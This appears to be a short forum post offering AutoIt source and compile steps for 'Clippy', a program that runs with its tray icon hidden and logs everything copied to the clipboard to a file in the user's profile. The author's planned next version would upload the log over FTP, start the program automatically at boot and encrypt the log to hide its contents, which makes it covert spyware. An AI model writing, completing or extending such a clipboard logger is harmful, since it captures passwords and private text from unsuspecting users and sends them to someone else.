This code will create an Executable approximately 300KB that will run on your computer logging clip board data to a text file in %USERPROFILE%\ClipLog.log
- Download Autoit from http://www.autoitscript.com/site/
- Open SciTE
- Copy the code from below and paste it in SciTE
- Save the file and hit F5 to test the script
- Browse to %USERPROFILE%
- Open ClipLog.log to view logged clip board text.
- If it's all good then Ctrl + Break to stop the script
- Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
- Copy Log to ftp
- Auto start program on power on.
- encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0
#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>
While 1
$Clippy = _ClipBoard_GetData()
if $Clippy <> "0" Then
if $Clippy <> $txtClipboard Then
_FileWriteLog(@UserProfileDir & "\ClipLog.log",$Clippy)
EndIf
EndIf
$txtClipboard=$Clippy
Sleep(100)
WEnd
Exit
Enjoy, Comment below.